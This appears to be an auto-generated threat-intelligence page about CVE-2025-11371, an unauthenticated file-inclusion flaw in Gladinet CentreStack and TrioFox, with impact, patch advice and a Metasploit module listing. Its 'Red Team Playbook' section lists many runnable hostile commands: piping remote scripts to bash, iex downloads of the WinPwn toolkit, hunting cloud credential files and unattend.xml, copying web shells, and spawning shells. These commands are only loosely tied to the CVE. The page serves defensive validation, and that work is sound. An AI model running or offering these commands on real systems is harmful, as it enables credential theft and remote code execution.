CVE-2025-11371
Overview
This vulnerability is an unauthenticated Local File Inclusion (LFI) flaw rooted in improper input validation within the file retrieval mechanism of Gladinet CentreStack and TrioFox. Specifically, the affected component fails to sanitize user-supplied path parameters in HTTP GET requests, allowing directory traversal sequences to access arbitrary system files. The flaw resides in the handling of the /storage/t.dn endpoint, where relative path traversal is exploited to include sensitive configuration files from the server filesystem.
Vulnerability Description
In the default installation and configuration of Gladinet CentreStack and TrioFox, there is an unauthenticated Local File Inclusion Flaw that allows unintended disclosure of system files. Exploitation of this vulnerability has been observed in the wild. This issue impacts Gladinet CentreStack and Triofox: All versions prior to and including 16.7.10368.56560
Impact
An unauthenticated attacker can retrieve sensitive system and application configuration files, potentially exposing credentials, internal paths, or other confidential data. No user interaction or valid credentials are required to exploit this flaw. This information disclosure can facilitate further attacks such as privilege escalation, lateral movement, or targeted exploitation of the affected environment, leading to significant data breaches and operational compromise.
Solution
Users should upgrade Gladinet CentreStack and TrioFox to versions later than 16.7.10368.56560 as recommended by the vendor. Detailed patch instructions and updates are available through the vendor’s official advisory and the Huntress blog at https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw. Applying these updates mitigates the vulnerability by enforcing proper input validation and access controls on the affected endpoints.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the default installation and configuration of Gladinet CentreStack and TrioFox is characterized as an unauthenticated Local File Inclusion (LFI) flaw. This type of vulnerability allows an attacker to manipulate input parameters to include files from the server's filesystem. In this case, the flaw enables unauthorized access to sensitive system files, which could lead to the disclosure of critical information such as configuration files, user credentials, or other sensitive data stored on the server. The unauthenticated nature of this vulnerability means that an attacker does not need to be logged in or possess any special privileges to exploit it, significantly increasing the risk of exploitation.
Attack vectors for this vulnerability are relatively straightforward, as they often involve crafting specific HTTP requests that exploit the LFI flaw. An attacker could leverage this vulnerability by sending specially crafted requests to the affected applications, targeting file inclusion mechanisms that do not properly validate user input. For instance, if the application allows users to specify a file path without adequate sanitization, an attacker could manipulate this input to include sensitive files from the server. Exploitation scenarios may include accessing sensitive configuration files, which could reveal database credentials or API keys, or even executing arbitrary code if the included files contain executable scripts. The simplicity of this attack vector makes it particularly concerning, as it can be executed with minimal technical expertise and can be automated for mass exploitation.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Gladinet CentreStack and TrioFox for file management and sharing. The potential for unintended disclosure of system files poses a serious business risk, as it could lead to data breaches, loss of intellectual property, and reputational damage. Organizations may face regulatory scrutiny and financial penalties if sensitive data is exposed, especially if it involves personal information or proprietary business data. Moreover, the exploitation of this vulnerability has been observed in the wild, indicating that threat actors are actively seeking to exploit it, thereby increasing the urgency for organizations to address this issue.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is critical to ensure that all instances of Gladinet CentreStack and TrioFox are updated to the latest versions, as this will patch the vulnerability. Regularly reviewing and updating software is a fundamental practice in cybersecurity hygiene. Additionally, organizations should conduct thorough security assessments, including penetration testing and code reviews, to identify and remediate any potential vulnerabilities in their applications. Implementing web application firewalls (WAF) can also help detect and block malicious requests attempting to exploit the LFI flaw. Furthermore, employing input validation and output encoding practices can significantly reduce the risk of such vulnerabilities by ensuring that user inputs are properly sanitized before being processed by the application.
In conclusion, the unauthenticated Local File Inclusion vulnerability in Gladinet CentreStack and TrioFox presents a serious threat to organizations utilizing these products. The ease of exploitation, coupled with the potential for significant data exposure, underscores the importance of proactive security measures. By updating software, conducting regular security assessments, and implementing robust input validation, organizations can effectively mitigate the risks associated with this vulnerability and protect their sensitive data from unauthorized access.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2025-11371, evidenced by the emergence of a new Metasploit module that facilitates unauthenticated path traversal attacks against Gladinet CentreStack and TrioFox. This development significantly lowers the technical barrier for adversaries to exploit the vulnerability, enabling broader and more automated attacks. Our telemetry indicates a sharp increase in detection events related to this exploit, underscoring a growing attacker interest and operationalization in the wild. Although the EPSS score has slightly decreased, it remains high and continues an upward trend over the past week, reflecting sustained exploitability and risk. The inclusion of this vulnerability in the KEV catalog further elevates its priority for defenders, signaling increased recognition of its potential impact. Collectively, these factors intensify the threat landscape, raising the urgency for organizations using affected versions to reassess their exposure and monitoring strategies. The risk level is now elevated to critical due to the combination of active exploitation, publicly available attack tools, and the vulnerability’s capacity to disclose sensitive configuration files that could facilitate secondary attacks.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Gladinet | Centrestack | All |
cpe:2.3:a:gladinet:centrestack:*:*:*:*:*:*:*:*
|
|
|
Gladinet | Triofox | All |
cpe:2.3:a:gladinet:triofox:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Gladinet CentreStack/Triofox Path Traversal
auxiliary/gather/gladinet_storage_path_traversal_cve_2025_11371
|
Huntress Team | Unknown | - | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-150 | Collect Data from Common Resource Locations |
35%
|
— | Medium | |
| CAPEC-639 | Probe System Files |
30%
|
— | Medium |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-11371 |
| huntress.com |
GitHub CVE
|
https://www.huntress.com/blog/gladinet-centrestack-triofox-local-file-inclusion-flaw |
| centrestack.com |
NVD API
Release Notes
|
https://www.centrestack.com/p/gce_latest_release.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-11371 |